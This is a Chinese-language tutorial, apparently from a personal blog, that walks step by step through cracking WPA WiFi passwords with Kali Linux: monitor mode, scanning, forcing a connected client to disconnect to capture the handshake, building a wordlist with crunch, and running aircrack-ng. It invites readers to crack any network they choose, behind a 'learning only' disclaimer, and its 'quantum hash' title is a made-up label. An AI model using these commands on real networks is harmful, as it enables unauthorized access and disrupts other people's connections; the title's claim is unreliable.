量子哈希破解WiFi密码的方法(仅供学习使用)(严禁商业使用,仅限个人学习)
一、安装kalilinux
首先,您需要详细查看我之前的博客中关于kalilinux安装的教程。完成安装后,您可以继续跟随下面的教程。
二、开始破解
2.1 破解前的准备:
-
准备一个无线网卡(请注意:要选择免驱动的USB网卡),您可以在淘宝购买,确保支持网络监听功能。
-
已经安装好的kalilinux系统。
2.2 开始操作
2.2.1 插入网卡,并将其连接到虚拟机。
按照下图的指示找到您的网卡,并点击连接。如果已经连接上了,会显示断开连接的提示。
2.2.1.2 验证网卡是否成功连接到虚拟机
如果右下角出现了相应的图标,表示网卡连接成功。
2.2.2 检查网卡是否支持监听
输入以下命令:airmon-ng
该命令会列出当前检测到的可适配的网卡。我的网卡显示为rt2800usb,可能与您的有所不同。
2.2.3 将网卡切换至监听模式
输入以下命令:airmon-ng start wlan0
该命令将网卡切换至监听模式,请稍等片刻。
2.2.4 检查是否已成功切换至监听模式
输入以下命令:ifconfig或iwconfig
效果如下图所示:
如果出现wlan0mon,表示监听模式已经开启。
2.2.5 扫描当前区域的WiFi信号
输入以下命令:airodump-ng wlan0mon
该命令会列出当前区域内的WiFi信息。
按下Q键或者Ctrl+C可以停止扫描。
2.2.5.1 可能会出现扫描不到任何网络的情况
如果出现这种情况,请重新执行一遍操作,或者拔出网卡再插入一次,然后重新执行操作,通常两到三次就可以解决。
2.2.6 选择要破解的WiFi
我选择的是自己的WiFi,名字叫cmcc-qnch。
您可以选择您想要破解的WiFi。
第一列是MAC地址,稍后会用到,您可以复制下来。
我这里的MAC地址是3C:E3:E7:61:AF:2F。
另外,后面有一列叫ch的是网络的信道,也要记下来,稍后会用到。
我这里的信道是7。
2.2.7 准备抓取握手包
输入以下命令:airodump-ng -c 7 -w wifibao.cap –bssid 3C:E3:E7:61:AF:2F wlan0mon
-c 指的是信道,就是上面让您记住的。
-w 指的是存放握手包密码的文件。
–bssid 指的是MAC地址。
最后加上当前网卡的名称。
请稍等片刻。
2.2.8 另开一个终端,开始强制用户断开重连,以获取握手包
输入以下命令:aireplay -0 10 -c D6:8D:4F:8F:C3:1A -a 3C:E3:E7:61:AF:2F wlan0mon
上面的参数解释如下:
-0 指的是断开重连,获取握手包的次数。
-c 是当前连接此WiFi的用户的MAC地址。
-a 是路由器的MAC地址,即之前您获取到的MAC地址。
2.2.9 抓取握手包成功
如果出现上述情况,表示抓取握手包成功。
2.2.10 开始创建密码字典
为了方便起见,我自己生成了一个快速破解且适合自己的密码字典。
输入以下命令:crunch 8 8 -t cubmsgk% -o 1.txt
第一个8表示密码字典的最小位数,第二个8表示最大位数。
-t 表示按照指定格式生成密码字典。
-o 表示将字典输出到指定文件夹中。
如果不想自己生成字典,可以使用kalilinux自带的字典。
首先解压:gzip -d /usr/share/wordlists/rockyou.txt.gz
解压完成后,就可以使用了,请记住路径。
2.2.11 开始破解
输入以下命令:aircrack-ng -w 字典路径 握手包路径
请稍等片刻。
密码最终会显示出来,”key found”中的内容就是密码。
至此,破解成功!欢迎大家学习,如果有任何问题,请在评论区告诉我!
